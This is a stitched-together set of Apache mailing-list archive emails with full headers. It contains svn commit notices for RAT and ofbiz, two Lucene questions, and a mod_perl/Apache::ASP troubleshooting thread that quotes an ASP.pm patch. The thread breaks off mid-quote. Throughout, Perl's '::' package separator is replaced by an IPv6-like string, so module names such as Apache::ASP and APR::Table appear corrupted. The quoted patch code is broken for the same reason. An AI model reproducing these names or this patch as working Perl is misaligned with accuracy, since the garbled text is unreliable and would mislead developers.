Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: gmcdonald Date: Tue Mar 29 04:24:15 2011 New Revision: 1086469 URL: http://svn.apache.org/viewvc?rev=1086469&view=rev Log: whitespace change to test buildbot trigger Modified: incubator/rat/main/trunk/pom.xml Modified: incubator/rat/main/trunk/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/pom.xml?rev=1086469&r1=1086468&r2=1086469&view=diff ============================================================================== --- incubator/rat/main/trunk/pom.xml (original) +++ incubator/rat/main/trunk/pom.xml Tue Mar 29 04:24:15 2011 @@ -15,6 +15,7 @@ See the License for the specific language governing permissions and limitations under the License. --> + <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> From [email protected] Wed Mar 30 05:08:28 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26017 invoked from network); 30 Mar 2011 05:08:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2011 05:08:28 -0000 Received: (qmail 60573 invoked by uid 500); 30 Mar 2011 05:08:27 -0000 Delivered-To: [email protected] Received: (qmail 60536 invoked by uid 500); 30 Mar 2011 05:08:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60529 invoked by uid 99); 30 Mar 2011 05:08:25 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 Mar 2011 05:08:25 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 Mar 2011 05:08:22 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D0EDD23888CD; Wed, 30 Mar 2011 05:08:01 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1086839 - /incubator/rat/main/trunk/pom.xml Date: Wed, 30 Mar 2011 05:08:01 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: gmcdonald Date: Wed Mar 30 05:08:01 2011 New Revision: 1086839 URL: http://svn.apache.org/viewvc?rev=1086839&view=rev Log: Another test to trigger buildbot Modified: incubator/rat/main/trunk/pom.xml Modified: incubator/rat/main/trunk/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/pom.xml?rev=1086839&r1=1086838&r2=1086839&view=diff ============================================================================== --- incubator/rat/main/trunk/pom.xml (original) +++ incubator/rat/main/trunk/pom.xml Wed Mar 30 05:08:01 2011 @@ -15,7 +15,6 @@ See the License for the specific language governing permissions and limitations under the License. --> - <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <parent>
From [email protected] Wed Jul 12 11:37:37 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73359 invoked from network); 12 Jul 2006 11:37:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Jul 2006 11:37:37 -0000 Received: (qmail 31516 invoked by uid 500); 12 Jul 2006 11:37:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <c-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31478 invoked by uid 99); 12 Jul 2006 11:37:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Jul 2006 04:37:29 -0700 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO py-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Jul 2006 04:37:28 -0700 Received: by py-out-1112.google.com with SMTP id z59so185328pyg for <[email protected]>; Wed, 12 Jul 2006 04:37:07 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type; b=rd9d52o0y447yyVFldfSWbPI5I67KaU7ca3EpKpdwSBCN4TZOPGMgAGF4fkPngAkL1naeFq0trmtfHsvIxmeDLXlXAhuUuv+7siavZ4MmJK72dJ9bUnWA4gsM+TvfF1Ny+dSSMab+UnBC+vzzFPor2Fu3JQpB5ZRmE18KxPCYz8= Received: by 161.129.204.104 with SMTP id m12mr743187pyn; Wed, 12 Jul 2006 04:37:07 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 12 Jul 2006 04:37:07 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 12 Jul 2006 17:07:07 +0530 From: "sudarshan angirash" <[email protected]> To: [email protected], [email protected], [email protected], [email protected] Subject: query for search through lucene for BLOB MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_3087_13461066.1152704227643" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_3087_13461066.1152704227643 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline hi all i have some PDF files stored in Oracle 9i as BLOB. now i want to search for a string in those pdf files using Lucene. then i want to show the selected PDF files which contains The String. if you can give me any pointers about how to do it, then it will be a gr8 help for me. regards sudarshan ------=_Part_3087_13461066.1152704227643-- From [email protected] Thu Jul 13 11:48:17 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4051 invoked from network); 13 Jul 2006 11:48:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Jul 2006 11:48:17 -0000 Received: (qmail 91937 invoked by uid 500); 13 Jul 2006 11:48:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <c-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91885 invoked by uid 99); 13 Jul 2006 11:48:14 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 13 Jul 2006 04:48:14 -0700 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO py-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 13 Jul 2006 04:48:12 -0700 Received: by py-out-1112.google.com with SMTP id f25so206438pyf for <[email protected]>; Thu, 13 Jul 2006 04:47:51 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type; b=HyfKNA/R+j9Imo4Vz/w0eFebq2qYMypnPIFS5mJ8cXjSB36N7Y2UZb5zop49fV47nA8mTG/G6UVcJxB73AafoyVCeqYN1lksQH3c7rw4jtQecXV/++r9bX+oV2Bp8G/L/v/pbivUtVI0SImoZ2ybGhhV+xtgAB5ithDtGKRAx6g= Received: by 161.129.204.104 with SMTP id m12mr607678pyn; Thu, 13 Jul 2006 04:47:51 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 13 Jul 2006 04:47:51 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 13 Jul 2006 17:17:51 +0530 From: "sudarshan angirash" <[email protected]> To: [email protected], [email protected] Subject: relevance in Lucene MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_9210_16682101.1152791271504" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_9210_16682101.1152791271504 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline hi Friends i would like to know that on what behalf Lucene defines "Relevance" in search results. if anyone worked on Relevance parameter from Lucene, then please do help me................. regards, Sudarshan ------=_Part_9210_16682101.1152791271504--
From [email protected] Thu Mar 09 07:30:39 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37550 invoked from network); 9 Mar 2006 07:30:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Mar 2006 07:30:39 -0000 Received: (qmail 61232 invoked by uid 500); 9 Mar 2006 07:30:39 -0000 Delivered-To: [email protected] Received: (qmail 61202 invoked by uid 500); 9 Mar 2006 07:30:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ofbiz-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 25313 invoked by uid 500); 9 Mar 2006 04:29:15 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Message-ID: <[email protected]> Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r384424 - /incubator/ofbiz/ Date: Thu, 09 Mar 2006 04:28:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.7 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: rooneg Date: Wed Mar 8 20:28:52 2006 New Revision: 384424 URL: http://svn.apache.org/viewcvs?rev=384424&view=rev Log: Create a directory in the incubator for the ofbiz podling. Added: incubator/ofbiz/
From [email protected] Tue Jun 06 16:28:36 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61021 invoked from network); 6 Jun 2006 16:28:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2006 16:28:36 -0000 Received: (qmail 22180 invoked by uid 500); 6 Jun 2006 16:28:36 -0000 Delivered-To: [email protected] Received: (qmail 21994 invoked by uid 500); 6 Jun 2006 16:28:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 21983 invoked by uid 99); 6 Jun 2006 16:28:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 09:28:34 -0700 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO sccrmhc13.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 09:28:29 -0700 Received: from best.com (c-24-6-61-94.hsd1.ca.comcast.net[161.129.204.104]) by comcast.net (sccrmhc13) with SMTP id <20060606162807013003qqspe>; Tue, 6 Jun 2006 16:28:08 +0000 Message-ID: <[email protected]> Date: Tue, 06 Jun 2006 09:28:06 -0700 From: Maurice Yarrow <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4.1) Gecko/20031114 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: ASP error: Can't locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable"... Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello ASP people Environment: FC1 apache httpd 2.0.58 perl5.8.8 BLDBM, BLDBMacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSync, Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP (2.59) - I just installed these. mod_perl.so (2.0.2) installed, httpd.conf configured with appropriate LoadModule directive After making and installing the above perl modules, copied the Apache-ASP-2.59/site/asp directory tree to htdocs (including, of course, htdocs/asp/eg/.htaccess), added the appropriate <Directory "/usr/local/apache2/htdocs/asp/eg" > Options FollowSymLinks AllowOverride All </Directory> directive. Can go to http://localhost/asp (index.html), but get the below error message when going to http://localhost/asp/eg (i.e., the examples dir from above): [Tue Jun 06 00:05:32 2006] [error] [client 161.129.204.104] Can't locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" at /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line 2016.\n at /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line 2016\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dir_config('APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable=HASH(0x85005c4)', 'Global') called at /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line 275\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnew('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP', 'Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=SCALAR(0x85005a0)', '/usr/local/apache2/htdocs/asp/eg/index.html') called at /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line 183\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhandler('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=SCALAR(0x85005a0)') called at -e line 0\n\teval {...} called at -e line 0\n [root@orion Apache-ASP-2.59]# I observe that this is an error that has been reported previously in the ASP user group archives (currently maintained at yahoo), but I saw no indication of a resolution. (I am not a yahoo special interest group member, so did not pursue it further at that location.) Any ideas ? Regards, Maurice Yarrow --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jun 12 06:26:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2972 invoked from network); 12 Jun 2006 06:26:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Jun 2006 06:26:12 -0000 Received: (qmail 66044 invoked by uid 500); 12 Jun 2006 06:26:12 -0000 Delivered-To: [email protected] Received: (qmail 65864 invoked by uid 500); 12 Jun 2006 06:26:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 65853 invoked by uid 99); 12 Jun 2006 06:26:11 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 23:26:11 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.hzlabs.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 11 Jun 2006 23:26:06 -0700 Received: from p549b60f5.dip.t-dialin.net ([161.129.204.104] helo=[161.129.204.104]) by mail.hzlabs.de with esmtpa (Exim 4.44) id 1Fpfrs-0006sm-0q; Mon, 12 Jun 2006 08:25:44 +0200 Message-ID: <[email protected]> Date: Mon, 12 Jun 2006 08:25:43 +0200 From: Helmut Zeilinger <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20060420) MIME-Version: 1.0 To: Maurice Yarrow <[email protected]> CC: [email protected] Subject: Re: ASP error: Can't locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable"... References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi Maurice, can you check of few things: Is there an APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable module? (Usually in a subtree of "/usr/lib/perl5") This should have been created/installed within the mod_perl 2 installation (from the source package). If yes what version is it ? Are there multiple (outdated) versions of it installed? If no, how did you install mod_perl? Can you reinstall it from the mod_perl's source: http://perl.apache.org/dist/mod_perl-2.0-current.tar.gz Helmut Maurice Yarrow schrieb: > Hello ASP people > > Environment: > FC1 > apache httpd 2.0.58 > perl5.8.8 > BLDBM, BLDBMacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSync, Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP (2.59) - I just installed these. > mod_perl.so (2.0.2) installed, httpd.conf configured with appropriate > LoadModule directive > > After making and installing the above perl modules, copied the > Apache-ASP-2.59/site/asp directory tree to htdocs (including, > of course, htdocs/asp/eg/.htaccess), added the appropriate > <Directory "/usr/local/apache2/htdocs/asp/eg" > > Options FollowSymLinks > AllowOverride All > </Directory> > directive. > Can go to http://localhost/asp (index.html), but get the below error > message when going to http://localhost/asp/eg (i.e., the examples > dir from above): > > [Tue Jun 06 00:05:32 2006] [error] [client 161.129.204.104] Can't locate > object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" at > /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line 2016.\n at > /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line > 2016\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dir_config('APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable=HASH(0x85005c4)', > 'Global') called at /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm > line 275\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnew('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP', > 'Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=SCALAR(0x85005a0)', > '/usr/local/apache2/htdocs/asp/eg/index.html') called at > /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line > 183\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhandler('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=SCALAR(0x85005a0)') > called at -e line 0\n\teval {...} called at -e line 0\n > [root@orion Apache-ASP-2.59]# > > I observe that this is an error that has been reported previously in > the ASP user group archives (currently maintained at yahoo), but > I saw no indication of a resolution. (I am not a yahoo special > interest group member, so did not pursue it further at that location.) > > Any ideas ? > > Regards, > Maurice Yarrow > > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jun 12 14:13:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45775 invoked from network); 12 Jun 2006 14:13:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Jun 2006 14:13:29 -0000 Received: (qmail 89088 invoked by uid 500); 12 Jun 2006 14:13:28 -0000 Delivered-To: [email protected] Received: (qmail 89070 invoked by uid 500); 12 Jun 2006 14:13:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 89056 invoked by uid 99); 12 Jun 2006 14:13:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 07:13:28 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO theoryx5.uwinnipeg.ca) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 07:13:24 -0700 Received: from theoryx5.uwinnipeg.ca (localhost.localdomain [161.129.204.104]) by theoryx5.uwinnipeg.ca (8.12.8/8.12.8) with ESMTP id k5CE66vo031322; Mon, 12 Jun 2006 09:06:06 -0500 Received: from localhost (randy@localhost) by theoryx5.uwinnipeg.ca (8.12.8/8.12.8/Submit) with ESMTP id k5CE63dk031317; Mon, 12 Jun 2006 09:06:05 -0500 Date: Mon, 12 Jun 2006 09:06:03 -0500 (CDT) From: Randy Kobes <[email protected]> To: Maurice Yarrow <[email protected]> cc: [email protected] Subject: Re: ASP error: Can't locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable"... In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Tue, 6 Jun 2006, Maurice Yarrow wrote: > Hello ASP people > > Environment: > FC1 > apache httpd 2.0.58 > perl5.8.8 > BLDBM, BLDBMacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSync, Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP (2.59) - I just installed these. > mod_perl.so (2.0.2) installed, httpd.conf configured with appropriate > LoadModule directive > > After making and installing the above perl modules, copied the > Apache-ASP-2.59/site/asp directory tree to htdocs (including, > of course, htdocs/asp/eg/.htaccess), added the appropriate > <Directory "/usr/local/apache2/htdocs/asp/eg" > > Options FollowSymLinks > AllowOverride All > </Directory> > directive. > Can go to http://localhost/asp (index.html), but get the below error > message when going to http://localhost/asp/eg (i.e., the examples > dir from above): > > [Tue Jun 06 00:05:32 2006] [error] [client 161.129.204.104] Can't locate object > method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" at > /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line 2016.\n at [ ... ] Usually these errors are a result of not use()ing the module in question; from perl -MModPerlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bMethodLookup -e print_method get the relevant module is APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable. However, this module should have been loaded (in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP 2.59) by Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpacheCommon. Did all of the mod_perl and Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP tests succeed when you installed them? If so, does adding use APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable (); at the beginning of Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP help? -- best regards, Randy Kobes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jun 12 18:22:36 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36248 invoked from network); 12 Jun 2006 18:22:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Jun 2006 18:22:36 -0000 Received: (qmail 93453 invoked by uid 500); 12 Jun 2006 18:22:36 -0000 Delivered-To: [email protected] Received: (qmail 93438 invoked by uid 500); 12 Jun 2006 18:22:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 93427 invoked by uid 99); 12 Jun 2006 18:22:35 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 11:22:35 -0700 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO sccrmhc13.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jun 2006 11:22:32 -0700 Received: from best.com (c-24-6-61-94.hsd1.ca.comcast.net[161.129.204.104]) by comcast.net (sccrmhc13) with SMTP id <20060612182210013005uhipe>; Mon, 12 Jun 2006 18:22:11 +0000 Message-ID: <[email protected]> Date: Mon, 12 Jun 2006 11:22:05 -0700 From: Maurice Yarrow <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4.1) Gecko/20031114 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Randy Kobes <[email protected]> CC: [email protected] Subject: Re: ASP error: Can't locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable"... References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Randy, et. al.: I sent this reply out yesterday (see below) in response to Helmut's similar reply and request for for further info. As you see, there was a patch tendered a year ago, but not yet incorporated into any release. The patch certainly worked for me, as it had it's author, but whether this is a righteous patch or not is not for me to determine, but rather the ASP community. However, thanks for you reply and concern. Maurice Yarrow Helmut Thankyou for responding. Actually, I found a patch that solved the problem: And , in fact, this turned out to be a patch to ASP.pm, not APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable.pm. It was turned in in a formal patch designation on 2005-06-22 See: http://[email protected]/msg02428.html The lines 65-71: if($ENV{MOD_PERL}) { $ModPerl2 = ($mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION >= 1.99); if($ModPerl2) { eval "use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpacheCommon ();"; die($@) if $@; } } become if($ENV{MOD_PERL}) { $ModPerl2 = ($mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION >= 1.99); my $ver = $mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION; if ($ver eq "") { $ver = $ENV{MOD_PERL_API_VERSION}; } $ModPerl2 = ($ver >= 1.99); if($ModPerl2) { eval "use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpacheCommon ();"; die($@) if $@; } } Note that you can find this correspondence by using Yahoo's search engine: just search for the exact Apache error message: Can't locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" Once again, thanks for responding. Maurice Yarrow Helmut Zeilinger wrote: Hi Maurice, can you check of few things: Is there an APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable module? (Usually in a subtree of "/usr/lib/perl5") This should have been created/installed within the mod_perl 2 installation (from the source package). If yes what version is it ? Are there multiple (outdated) versions of it installed? If no, how did you install mod_perl? Can you reinstall it from the mod_perl's source: http://perl.apache.org/dist/mod_perl-2.0-current.tar.gz Helmut Randy Kobes wrote: > On Tue, 6 Jun 2006, Maurice Yarrow wrote: > >> Hello ASP people >> >> Environment: >> FC1 >> apache httpd 2.0.58 >> perl5.8.8 >> BLDBM, BLDBMacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSync, Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP (2.59) - I just installed these. >> mod_perl.so (2.0.2) installed, httpd.conf configured with appropriate >> LoadModule directive >> >> After making and installing the above perl modules, copied the >> Apache-ASP-2.59/site/asp directory tree to htdocs (including, >> of course, htdocs/asp/eg/.htaccess), added the appropriate >> <Directory "/usr/local/apache2/htdocs/asp/eg" > >> Options FollowSymLinks >> AllowOverride All >> </Directory> >> directive. >> Can go to http://localhost/asp (index.html), but get the below error >> message when going to http://localhost/asp/eg (i.e., the examples >> dir from above): >> >> 